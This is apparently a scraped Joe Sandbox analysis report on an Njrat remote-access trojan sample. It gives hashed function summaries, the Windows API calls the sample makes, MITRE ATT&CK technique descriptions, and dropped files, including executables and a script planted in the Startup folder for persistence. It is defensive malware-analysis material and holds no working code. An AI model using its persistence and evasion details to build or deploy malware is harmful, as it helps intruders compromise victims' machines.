Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: feda5ca761851f314dd81957129825d91700e3ae68c82b307774c1bed3763a1c
Instruction ID: 576004c8ac932d704f7a109c84b0d5d3ac28f09c7266d6ce7b00d02e63f6edd7
Opcode Fuzzy Hash: feda5ca761851f314dd81957129825d91700e3ae68c82b307774c1bed3763a1c
Instruction Fuzzy Hash: 102192716002409FEB10DF65DD45BA6FBE8EF15324F14C4A9E9449B741D375E908CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A67B Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00C2A6F6

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9636079630e8d6f0ced0247cc6cdb8dc87459c3cfa5ce73b6ec925135ca1e829
Instruction ID: 271b7e78f5aae86c53f95b24eda7aa03ec7196ed6b423bfa2c0573aabd80de1c
Opcode Fuzzy Hash: 9636079630e8d6f0ced0247cc6cdb8dc87459c3cfa5ce73b6ec925135ca1e829
Instruction Fuzzy Hash: 252180755093805FDB128B65DC85B92BFF8EF16310F0984DAE884CB6A3D234D908C762

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A392 Relevance: 1.6, APIs: 1, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,E3D593FF,00000000,00000000,00000000,00000000), ref: 00C2A40C

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3eca5a8184a6661f8224c5e5899f2d80c2f940cc5cb4348ef45e790101338148
Instruction ID: 153c267ac5ee6b80739745b7327ec247786b41c537d154efdb7b82fca0da4fe6
Opcode Fuzzy Hash: 3eca5a8184a6661f8224c5e5899f2d80c2f940cc5cb4348ef45e790101338148
Instruction Fuzzy Hash: 7F21C076600600AFEB20CF16DC84FA2F7ECEF04720F18C45AE9458BA51D774E948CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A960 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00C2A9CC

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c52271349bbe7894e35c0446965d666a2d330a536d9a9fc04ccbc1622143ad6d
Instruction ID: c71f0fa0ab7e9ae50b824cd16851b38e72bbc91281ddaea407554da9b2c13eff
Opcode Fuzzy Hash: c52271349bbe7894e35c0446965d666a2d330a536d9a9fc04ccbc1622143ad6d
Instruction Fuzzy Hash: 8D21C3715093C09FDB128F25DC54B92BFB4AF57324F0984DAEC858F663D274A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A486 Relevance: 1.6, APIs: 1, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,E3D593FF,00000000,00000000,00000000,00000000), ref: 00C2A4F8

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 76912bd584cea8318935d454216f397f4cf0e94fbf92f9ddba148a8f8d12bfea
Instruction ID: 0ba81aa83d6798f432c391cd08e6589a45eadfee12d79e9274ef5f8355148e2e
Opcode Fuzzy Hash: 76912bd584cea8318935d454216f397f4cf0e94fbf92f9ddba148a8f8d12bfea
Instruction Fuzzy Hash: 7711B176500600AFEB218F11DC44FA7FBECEF14720F08845AED459AA51D774E948CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A6AE Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00C2A6F6

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c8fc18f1d969b017963119454472756964a5fd5ea9d670daa30b3a20eb8aa86d
Instruction ID: e97ebf01c4325759b4094a351b17289c19397ecef0eb6f4e802f85759a8a2fc5
Opcode Fuzzy Hash: c8fc18f1d969b017963119454472756964a5fd5ea9d670daa30b3a20eb8aa86d
Instruction Fuzzy Hash: 9611C8766002408FEB50CF25E885B56FBE8EF14720F18C4AAEC45DBB45D374E944CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A5E4 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00C2A634

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 87cf838955edd0dfc4400c8af159e9d1006b8bc7db0f9245f0fbe7afe62186cf
Instruction ID: 849301b265c123dd67785add39b30de1aaf2d6006d7d6025a863b587263550ed
Opcode Fuzzy Hash: 87cf838955edd0dfc4400c8af159e9d1006b8bc7db0f9245f0fbe7afe62186cf
Instruction Fuzzy Hash: 131182715053809FDB118F25DC84B56BFE4EF46620F0884AAED458F666D279A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A602 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00C2A634

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ec1633f8f4e95d0b272c22723bdd05f6b7e6239fbdbb0ff4067247572227d3b7
Instruction ID: 05be1658608c996e6881ca635877857174be0da113de780224a4a7194441adc1
Opcode Fuzzy Hash: ec1633f8f4e95d0b272c22723bdd05f6b7e6239fbdbb0ff4067247572227d3b7
Instruction Fuzzy Hash: 3201D475900240DFDB108F16E884766FBD4DF15720F08C4AAEC058BA56D378E508CE62

Uniqueness

Uniqueness Score: -1.00%

Function 00C2A99A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00C2A9CC

Memory Dump Source

Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 80a1634b0d2d5b741abf995091b786bdff9b9b26424258a41072f0e362aa2448
Instruction ID: 462b846178ce4d54297e4f8d93a2c427cb785dd34686dfb44f1266f3a1495ba2
Opcode Fuzzy Hash: 80a1634b0d2d5b741abf995091b786bdff9b9b26424258a41072f0e362aa2448
Instruction Fuzzy Hash: 7901D471500640CFDB50DF16E984752FBE4DF15320F18C0AADD498BA56D674E548DE62

Uniqueness

Uniqueness Score: -1.00%

Function 00E90080 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5baaff3913166877860022e111c2840dd1897ca4db6f05dcffc0a81b30f8e27
Instruction ID: ebbc05348e4aaf96a74d2d97ce55e9ee9e026015c63bd4fcc6028fabd1f13a9c
Opcode Fuzzy Hash: f5baaff3913166877860022e111c2840dd1897ca4db6f05dcffc0a81b30f8e27
Instruction Fuzzy Hash: 74416670215A828FC304FF3AE98178977B2EFA4209705C829D004CB26EDB34AD5DCB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E90020 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc73aa1f15441fd104aa7ddd8869e2a97479d05997fe8a94cd23f0e00067891
Instruction ID: 1d889474f4e0430ecb9dfb5b70b79d377448f4f82e244de782c2c168e3483d03
Opcode Fuzzy Hash: 3bc73aa1f15441fd104aa7ddd8869e2a97479d05997fe8a94cd23f0e00067891
Instruction Fuzzy Hash: BF019A3120D3C04FC3066739A8340693B76AF8321270904EBE481EB2A3CB3D9D49D3A2

Uniqueness

Uniqueness Score: -1.00%

Function 00EC05DF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1998747994.0000000000EC0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_ec0000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c622811fae8ecfff13ffb43c339dcb6259aa0cbfb31c3f09299e4b04e505d2
Instruction ID: 0bdcb7c06daf38f6012ba26d71ead76178ad5567150e0ee3134aa48250c5cce0
Opcode Fuzzy Hash: d6c622811fae8ecfff13ffb43c339dcb6259aa0cbfb31c3f09299e4b04e505d2
Instruction Fuzzy Hash: 4A018BB65097846FD7118F15AC44863FFB8DF96620709C49FEC4987652D135B908C762

Uniqueness

Uniqueness Score: -1.00%

Function 00EC0606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1998747994.0000000000EC0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_ec0000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a11b9991503ab74e9b525c68afb51997ad294fb4c1a7f88cfdaa15e7d9c3972
Instruction ID: efc29ad9bd51f07b1a38c8504296bf53e80c99171de3e1d7a4b412544e811f06
Opcode Fuzzy Hash: 5a11b9991503ab74e9b525c68afb51997ad294fb4c1a7f88cfdaa15e7d9c3972
Instruction Fuzzy Hash: 39E092B6A006449BD750CF0AEC81452F7D8EF98630708C07FDC0D8B711E639B508CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C223F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1994461805.0000000000C22000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C22000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c22000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 624ff1968e03e46a45be5b427a9c4e1d1d4853d08cad7bbd1115afc2af6ecdf8
Instruction ID: eb1f576f1bdee1beb62f1f55b7c756dd465aebbe84990e3a5410ca7053dc74bc
Opcode Fuzzy Hash: 624ff1968e03e46a45be5b427a9c4e1d1d4853d08cad7bbd1115afc2af6ecdf8
Instruction Fuzzy Hash: 5CD02E392006D04FD316AE0CE2A8B8537D4BB40708F0A00FAAC008BB63C768DAC4E600

Uniqueness

Uniqueness Score: -1.00%

Function 00C223BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1994461805.0000000000C22000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C22000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_c22000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 729b51da621bb1abc408eb9b3ce424c235411342cb8abc8ef0e9710b7138d4c3
Instruction ID: 339ab92e0bdc8a1a11b113c22f974221d6cb404c223b272f42ca969e02bc643d
Opcode Fuzzy Hash: 729b51da621bb1abc408eb9b3ce424c235411342cb8abc8ef0e9710b7138d4c3
Instruction Fuzzy Hash: 07D05E383406814BC719DE0CE2D4F5937D8AF40B15F0644E8AC208BB72C7A8DAC4CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00E9006D Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb83502392bb73ed2c0693a92dc81ffa8f06f86a4d5f257149493821585acf5
Instruction ID: ca1abe0d4549383cfc02aef4490e3daaa7fa1d6f8a7b4c4334991be60bead011
Opcode Fuzzy Hash: 7eb83502392bb73ed2c0693a92dc81ffa8f06f86a4d5f257149493821585acf5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nOZ2Oqnzbz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Njrat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\WindowsServices.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\nOZ2Oqnzbz.exe.log

C:\Users\user\AppData\Local\Temp\WindowsServices.exe

C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs

C:\Users\user\Desktop\nOZ2Oqnzbz.exe

C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)

\Device\ConDrv

Static File Info

General

Windows Analysis Report
nOZ2Oqnzbz.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre